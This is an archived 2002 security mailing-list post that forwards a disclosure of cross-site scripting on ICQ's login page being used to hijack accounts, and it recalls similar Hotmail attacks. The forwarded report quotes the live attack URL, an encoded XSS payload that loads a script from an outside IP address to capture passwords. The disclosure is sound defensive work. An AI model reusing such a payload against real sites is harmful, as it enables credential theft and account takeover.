WebApp Sec mailing list archives
Re: Top Ten Web App Sec Problems
From: "Alex Lambert" <alambert () webmaster com>
Date: Mon, 2 Dec 2002 18:44:24 -0600
Here's one from incidents/bugtraq today: From: "Rafael Coninck Teigao" <rafael () SafeCore NET> To: "SecurityFocus - Bugtraq" <bugtraq () securityfocus com>; "Security Focus' INCIDENTS" <INCIDENTS () securityfocus com> Sent: Monday, December 02, 2002 10:29 AM Subject: [Fwd: XSS on ICQ leading to password compromise]
Moderator: I've sent the following email to bugtraq last week. Haven't seen it on the list, but it came to my attention that even more account's were hijacked this way. I'm also sending this to incidents, because I think that maybe some administrators are receiving similar complaints from their users and could (perhaps) block the XSS pages somehow. -------- Original Message -------- From: Rafael Coninck Teigao <rafael () SafeCore NET> Subject: XSS on ICQ leading to password compromise To: SecurityFocus - Bugtraq <bugtraq () securityfocus com> CC: horvath () avalon sul com br, ahi () TELEFONICAEMPRESAS NET BR,nbso () nic br Hello, pp. I've tried to find some representative from de ICQ technical staff but had no success so far. Anyway, here's what's happening: A friend of mine got the following address on his ICQ from a friend on his contact list:
http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=<s cript%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E </script%3e
we can clearly see the <script... part on it. Unfortunately, he couldn't. When the page opened, he typed his email address and password. Five minutes later he was disconnected from ICQ and was unable to login again. He then tried to recover his password and saw that it was set to: aaaaa a that's right, it has a new line on it. The source on the script is: http://200.158.50.245/web/icq.asa That IP address comes from an ADSL from Telesp. The date and time of the incident were Nov/24 at 20:12 (GMT -2). He also told me that the friend who sent him the address and another person had their accounts hijacked as well. Best regards, Rafael Coninck Teigao SafeCore Network Solutions http://SafeCore.NET +55 41 224 1785 --
*snipped footers* apl ----- Original Message ----- From: "Kevin Spett" <kspett () spidynamics com> To: "Richard M. Smith" <rms () computerbytesman com>; <webappsec () securityfocus com> Sent: Monday, December 02, 2002 5:28 PM Subject: Re: Top Ten Web App Sec Problems
There have been a number of publicized Hotmail problems that were being exploited. This was back when you could send scripted content in an email message and it would get executed. You would open your mail, it'd pop up
a
window saying "Oh, I'm sorry you'll have to log in again" or something. Kevin Spett SPI Labs http://www.spidynamics.com/
Current thread:
- Re: Top Ten Web App Sec Problems, (continued)
- Re: Top Ten Web App Sec Problems Mark Curphey (Nov 30)
- Re: Top Ten Web App Sec Problems Matt Curtin (Nov 30)
- Re: Top Ten Web App Sec Problems bt (Nov 30)
- Re: Top Ten Web App Sec Problems Alex Russell (Dec 02)
- Re: Top Ten Web App Sec Problems Andrew Jaquith (Dec 02)
- Re: Top Ten Web App Sec Problems Alex Russell (Dec 02)
- Re: Top Ten Web App Sec Problems Mark Curphey (Nov 30)
- RE: Top Ten Web App Sec Problems Richard M. Smith (Dec 02)
- Re: Top Ten Web App Sec Problems Kevin Spett (Dec 02)
- Re: Top Ten Web App Sec Problems Alex Lambert (Dec 02)
- Re: Top Ten Web App Sec Problems Marc Slemko (Dec 02)
- RE: Top Ten Web App Sec Problems Richard M. Smith (Dec 03)